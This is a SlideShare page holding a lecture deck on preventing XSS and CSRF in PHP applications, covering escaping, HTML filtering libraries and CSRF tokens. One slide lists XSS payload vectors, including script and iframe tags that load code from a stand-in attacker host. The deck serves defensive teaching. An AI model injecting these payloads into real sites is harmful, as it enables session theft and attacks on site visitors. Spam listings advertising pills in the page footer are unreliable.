SlideShare uma empresa Scribd logo

Session7-XSS & CSRF

Z
zakieh alizadeh

Table Of Content Introduce XSS attacks Strategies for Preventing of XSS Introduce CSRF Attacks Strategies For Preventing Of CSRF

Software
1 de 32
Baixar para ler offline
Web Application Security (PHP) Zakieh Alizadeh zakiehalizadeh@gmail.com APA Laboratory – Ferdowsi University of Mashhad
Session 6 XSS & CSRF
XSS & CSRF  Scenarios :  Preventing XSS and CSRF Attacks In College Library Website Table Of Content  Introduce XSS attacks o Strategies for Preventing of XSS  Introduce CSRF Attacks o Strategies For Preventing Of CSRF
XSS & CSRF  Introduce XSS attacks  Strategies for Preventing of XSS  Introduce CSRF Attacks  Strategies For Preventing Of CSRF
XSS Introuduce Cross-site Scripting (XSS)  XSS enables attackers to inject client-side script into Web pages viewed by other users.  In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed.  Note : Often people refer to Cross Site Scripting as CSS or XSS, which is can be confused with Cascading Style Sheets (CSS).
XSS Cross-site Scripting (XSS)  Cross Site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might o compromise private information o manipulate or steal cookies o create requests that can be mistaken for those of a valid user o execute malicious code on the end-user systems.
XSS Type  There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS: o Non-persistent o Persistent o DOM-Based
XSS Non-persistent  These holes show up when the data provided by a web client, most commonly in HTTP query parameters or in HTML form submissions, is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the request.
XSS Persistent  The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping.
XSS  DOM-Based XSS Vulnerabilities  Both reflected and stored XSS vulnerabilities involve a specific pattern of behavior, in which the application takes user-controllable data and displays this back to users in an unsafe way. A third category of XSS vulnerabilities does not share this characteristic. Here, the process by which the attacker’s  JavaScript gets executed is as follows: o A user requests a crafted URL supplied by the attacker and containing embedded JavaScript. o The server’s response does not contain the attacker’s script in any form. o When the user’s browser processes this response, the script is executed nonetheless.
XSS XSS Pattern  There are many slight variations to this XSS attack, however all XSS attacks follow this pattern, which is depicted in the diagram below.
XSS  Cross-site Scripting (XSS)  In the pie-chart below, created by the Web Hacking Incident Database for 2011 (WHID)
XSS Cross-site Scripting (XSS)  what form does the data come? Tag Code <SCRIPT> <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT> <SCRIPT> alert(“XSS”); </SCRIPT> <BODY> <BODY ONLOAD=alert("XSS")> <BODY BACKGROUND="javascript:alert('XSS')"> <IMG> <IMG SRC="javascript:alert('XSS');"> <IFRAME> <IFRAME SRC=”http://hacker-site.com/xss.html”> <INPUT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');“>
XSS  Sanitization  Sanitization is type of Approaches to Input Handling .  Sometimes accept data that cannot be guaranteed as safe. Instead of rejecting this input, the application sanitizes it in various ways to prevent it from having any adverse effects.  Potentially malicious characters may be: o removed from the data altogether o leaving only what is known to be safe o suitably encoded or “escaped” before further processing is performed
XSS & CSRF  Introduce XSS attacks  Strategies for Preventing of XSS  Introduce CSRF Attacks  Strategies For Preventing Of CSRF
XSS Preventing XSS Attacks  Filtering for XSS  Escaping from XSS
XSS  Filtering for XSS  filter which will remove dangerous keywords, such as the infamous <SCRIPT> tag, JavaScript commands, CSS styles and other dangerous HTML markup (such as those that contain event handlers.)  Many web developers choose to implement their own filtering mechanisms; they usually write server-side code.(black list)  hackers usually have more experience than the web developers, and often manage to circumvent simple filters by using techniques such as hex encoding, unicode character variations, line breaks and null characters in strings.  recommended to use some sort of library that has been tried and tested by the community at large.
XSS  Filtering for XSS  PHP boasts a more comprehensive library called HTML Purifier which licensed as Open Source and can be customised depending on your needs. HTML Purifier also boasts strict standards compliance and better features than other filters.  Another interesting library you can use is HTML Markdown which converts text from your users into standard and clean XHTML. This gives the advantage that minimal HTML Markup can exist in your user's input (such as bold, underline and colours). HTML Markdown is a Perl library and does not explicitly advertise XSS prevention features so it probably should not be your only line of defence.
XSS Filtering for XSS  PHP Functions : o filter_var () o strip_tags() o htmlentities()
XSS  Escaping from XSS  This is the primary means to disable an XSS attack. When performing Escaping you are effectively telling the browser that the data you are sending should be treated as data and should not be interpreted in any other way.  Escaping has been used to construct this article. I have managed to bring many scripts into your browser, but none of these scripts has executed! The technique used to do that is called, escaping, or as the W3C calls it “Character Escaping”.  In HTML you can escape dangerous characters by using the &# sequence followed by the it’s character code.  An escaped < character looks like this: &#60. The > character is escaped like this: &#62.
XSS  Sanitization  Example o For example, the usual defense against cross-site scripting attacks is to HTML-encode dangerous characters before these are embedded into pages of the application code char &apos ; “ &amp ; ‘ &lt ; < & gt ; >
XSS Escaping from XSS  PHP Functions : o Htmlspecialchars()
XSS & CSRF  Introduce XSS attacks  Strategies for Preventing of XSS  Introduce CSRF Attacks  Strategies For Preventing Of CSRF
CSRF Introduction  Cross-Site Request Forgery, or CSRF for short is a common and regular online attack is. CSRF also goes by the acronym XSRF and the phrase Sea- Surf.  CSRF attacks include a malicious exploit of a website in which a user will transmit malicious requests that the target website trusts without the user’s consent.  In Cross-Site Scripting (XSS), the attacker exploits the trust a user has for a website, with CSRF on the other hand, the attacker exploits the trust a website has against a user’s browser.
CSRF Introduction 1. You visit 'good site' A, where you log-in and get a cookie to identify your session. 2. You leave site A, but forget to close your open session. 3. You visit 'bad site' B, where there is a malicious GET request hidden as an IMG. 4. Now, you are inadvertly executing an acction on site A, using the credentials from the cookie generated when you visited site A.
CSRF CSRF Sequence Diagram
XSS & CSRF  Introduce XSS attacks  Strategies for Preventing of XSS  Introduce CSRF Attacks  Strategies For Preventing Of CSRF
CSRF Prevention Measures That Do NOT Work  Using a Secret Cookie  Only Accepting POST Requests  Multi-Step Transactions  URL Rewriting
CSRF Prevention Measure :Token Pattern  A prevention measure could be the implementation and inclusion of tokens in a user’s (current) session.  Tokens are long cryptographic values that are difficult to guess. These will be generated when a user’s session begins and will be associated with this particular user’s session.  This challenge token will be included in each request, which will be used by the server side to verify the legitimacy of the end-user’s request.
CSRF  More Recommendation : Synchronizer Token Pattern  Checking The Referer Header  Challenge-Response o CAPTCHA o Re-Authentication (password)  Client/User Prevention o Logoff immediately after using a Web application o Do not allow your browser to save username/passwords o Do not use the same browser to access sensitive applications and to surf the Internet freely (tabbed browsing)
CSRF  Vulnerable Patterns for CSRF  Any application that accepts HTTP requests from an authenticated user without having some control to verify that the HTTP request is unique to the user's session.  By checking the page rendering we need to see if any unique identifiers are appended to the links rendered by the application in the user's browser. If there is no unique identifier relating to each HTTP request to tie a HTTP request to the user, we are vulnerable. Session ID is not enough, as the session ID shall be sent anyway if a user clicks on a rogue link, as the user is authenticated already.
XSS & CSRF

Recomendados

S5-Authorization
S5-AuthorizationS5-Authorization
S5-Authorizationzakieh alizadeh
 
S8-Session Managment
S8-Session ManagmentS8-Session Managment
S8-Session Managmentzakieh alizadeh
 
Session3 data-validation-sql injection
Session3 data-validation-sql injectionSession3 data-validation-sql injection
Session3 data-validation-sql injectionzakieh alizadeh
 
Session4-Authentication
Session4-AuthenticationSession4-Authentication
Session4-Authenticationzakieh alizadeh
 
Session2-Application Threat Modeling
Session2-Application Threat ModelingSession2-Application Threat Modeling
Session2-Application Threat Modelingzakieh alizadeh
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...Greg Sohl
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approachBlueinfy Solutions
 

Recomendados

S5-Authorization
S5-AuthorizationS5-Authorization
S5-Authorizationzakieh alizadeh
 
S8-Session Managment
S8-Session ManagmentS8-Session Managment
S8-Session Managmentzakieh alizadeh
 
Session3 data-validation-sql injection
Session3 data-validation-sql injectionSession3 data-validation-sql injection
Session3 data-validation-sql injectionzakieh alizadeh
 
Session4-Authentication
Session4-AuthenticationSession4-Authentication
Session4-Authenticationzakieh alizadeh
 
Session2-Application Threat Modeling
Session2-Application Threat ModelingSession2-Application Threat Modeling
Session2-Application Threat Modelingzakieh alizadeh
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...Application Security Part 1 Threat Defense In Client Server Applications ...
Application Security Part 1 Threat Defense In Client Server Applications ...Greg Sohl
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approachBlueinfy Solutions
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Owasp web security
Owasp web securityOwasp web security
Owasp web securityPankaj Kumar Sharma
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
A7 Missing Function Level Access Control
A7 Missing Function Level Access ControlA7 Missing Function Level Access Control
A7 Missing Function Level Access Controlstevil1224
 
Session9-File Upload Security
Session9-File Upload SecuritySession9-File Upload Security
Session9-File Upload Securityzakieh alizadeh
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Application Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh UmmerApplication Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh UmmerOWASP-Qatar Chapter
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharSandeep Kumbhar
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Web application sec_3
Web application sec_3Web application sec_3
Web application sec_3vhimsikal
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentationAshwini Paranjpe
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Nilesh Sapariya
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideLudovic Petit
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 

Mais conteúdo relacionado

Mais procurados

Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesMarco Morana
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
Web application attacks
Web application attacksWeb application attacks
Web application attackshruth
 
A7 Missing Function Level Access Control
A7 Missing Function Level Access ControlA7 Missing Function Level Access Control
A7 Missing Function Level Access Controlstevil1224
 
Session9-File Upload Security
Session9-File Upload SecuritySession9-File Upload Security
Session9-File Upload Securityzakieh alizadeh
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Application Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh UmmerApplication Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh UmmerOWASP-Qatar Chapter
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharSandeep Kumbhar
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Web application sec_3
Web application sec_3Web application sec_3
Web application sec_3vhimsikal
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationAlbena Asenova-Belal
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsKaty Anton
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Nilesh Sapariya
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideLudovic Petit
 

Mais procurados (20)

Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
Owasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root CausesOwasp Top 10 And Security Flaw Root Causes
Owasp Top 10 And Security Flaw Root Causes
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Owasp web security
Owasp web securityOwasp web security
Owasp web security
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
A7 Missing Function Level Access Control
A7 Missing Function Level Access ControlA7 Missing Function Level Access Control
A7 Missing Function Level Access Control
 
Session9-File Upload Security
Session9-File Upload SecuritySession9-File Upload Security
Session9-File Upload Security
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Application Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh UmmerApplication Security TRENDS – Lessons Learnt- Firosh Ummer
Application Security TRENDS – Lessons Learnt- Firosh Ummer
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbharCross site scripting (xss) attacks issues and defense - by sandeep kumbhar
Cross site scripting (xss) attacks issues and defense - by sandeep kumbhar
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Web application sec_3
Web application sec_3Web application sec_3
Web application sec_3
 
Owasp first5 presentation
Owasp first5 presentationOwasp first5 presentation
Owasp first5 presentation
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
OWASP Top 10 Proactive Controls
OWASP Top 10 Proactive ControlsOWASP Top 10 Proactive Controls
OWASP Top 10 Proactive Controls
 
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
Its all about CSRF - null Mumbai Meet 10 January 2015 Null/OWASP Chapter
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
OWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference GuideOWASP Secure Coding Practices - Quick Reference Guide
OWASP Secure Coding Practices - Quick Reference Guide
 

Semelhante a Session7-XSS & CSRF

Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site ScriptingAli Mattash
 
CROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.pptCROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.pptyashvirsingh48
 
XSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolXSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolArjun Jain
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encodingEoin Keary
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingInMobi Technology
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)Manish Kumar
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfyashvirsingh48
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Irfad Imtiaz
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Barrel Software
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
React security vulnerabilities
React security vulnerabilitiesReact security vulnerabilities
React security vulnerabilitiesAngelinaJasper
 
logout.php Session Data after Logout Username Email . $_.docx
logout.php Session Data after Logout Username Email . $_.docxlogout.php Session Data after Logout Username Email . $_.docx
logout.php Session Data after Logout Username Email . $_.docxsmile790243
 

Semelhante a Session7-XSS & CSRF (20)

Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
 
CROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.pptCROSS SITE SCRIPTING.ppt
CROSS SITE SCRIPTING.ppt
 
XSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolXSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing tool
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Reflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site ScriptingReflective and Stored XSS- Cross Site Scripting
Reflective and Stored XSS- Cross Site Scripting
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
xss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdfxss-100908063522-phpapp02.pdf
xss-100908063522-phpapp02.pdf
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
React security vulnerabilities
React security vulnerabilitiesReact security vulnerabilities
React security vulnerabilities
 
logout.php Session Data after Logout Username Email . $_.docx
logout.php Session Data after Logout Username Email . $_.docxlogout.php Session Data after Logout Username Email . $_.docx
logout.php Session Data after Logout Username Email . $_.docx
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 

Mais de zakieh alizadeh

Session11-NoSQL InjectionPHP Injection
Session11-NoSQL InjectionPHP Injection Session11-NoSQL InjectionPHP Injection
Session11-NoSQL InjectionPHP Injection zakieh alizadeh
 
Session6-Protecct Sensetive Data
Session6-Protecct Sensetive DataSession6-Protecct Sensetive Data
Session6-Protecct Sensetive Datazakieh alizadeh
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers zakieh alizadeh
 
Validating and Sanitizing User Data
Validating and Sanitizing User DataValidating and Sanitizing User Data
Validating and Sanitizing User Datazakieh alizadeh
 
Session3 data-validation
Session3 data-validationSession3 data-validation
Session3 data-validationzakieh alizadeh
 

Mais de zakieh alizadeh (8)

Session11-NoSQL InjectionPHP Injection
Session11-NoSQL InjectionPHP Injection Session11-NoSQL InjectionPHP Injection
Session11-NoSQL InjectionPHP Injection
 
Session6-Protecct Sensetive Data
Session6-Protecct Sensetive DataSession6-Protecct Sensetive Data
Session6-Protecct Sensetive Data
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers
 
yii framework
yii frameworkyii framework
yii framework
 
Web security Contents
Web security ContentsWeb security Contents
Web security Contents
 
Validating and Sanitizing User Data
Validating and Sanitizing User DataValidating and Sanitizing User Data
Validating and Sanitizing User Data
 
Session3 data-validation
Session3 data-validationSession3 data-validation
Session3 data-validation
 
Introduce Yii
Introduce YiiIntroduce Yii
Introduce Yii
 

Último

LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456KiaraTiradoMicha
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrainmasabamasaba
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfonteinmasabamasaba
 
Software Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsSoftware Quality Assurance Interview Questions
Software Quality Assurance Interview QuestionsArshad QA
 
Exploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfExploring the Best Video Editing App.pdf
Exploring the Best Video Editing App.pdfproinshot.com
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfkalichargn70th171
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplatePresentation.STUDIO
 
HR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comHR Software Buyers Guide in 2024 - HRSoftware.com
HR Software Buyers Guide in 2024 - HRSoftware.comFatema Valibhai
 
TECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providerTECUNIQUE: Success Stories: IT Service provider
TECUNIQUE: Success Stories: IT Service providermohitmore19
 
ManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ - Sprint 236 Review - Slide Deck
ManageIQ - Sprint 236 Review - Slide DeckManageIQ
 
%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisa%in tembisa+277-882-255-28 abortion pills for sale in tembisa
%in tembisa+277-882-255-28 abortion pills for sale in tembisamasabamasaba
 
Unlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language ModelsUnlocking the Future of AI Agents with Large Language Models
Unlocking the Future of AI Agents with Large Language Modelsaagamshah0812
 
10 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 202410 Trends Likely to Shape Enterprise Technology in 2024
10 Trends Likely to Shape Enterprise Technology in 2024Mind IT Systems
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsJhone kinadey
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...
MarTech Trend 2024 Book : Marketing Technology Trends (2024 Edition) How Data...Jittipong Loespradit
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
Direct Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidDirect Style Effect Systems - The Print[A] Example - A Comprehension Aid
Direct Style Effect Systems - The Print[A] Example - A Comprehension AidPhilip Schwarz
 
BUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxBUS PASS MANGEMENT SYSTEM USING PHP.pptx
BUS PASS MANGEMENT SYSTEM USING PHP.pptxalwaysnagaraju26
 

Último (20)

LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
LEVEL 5 - SESSION 1 2023 (1).pptx - PDF 123456
 
%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain
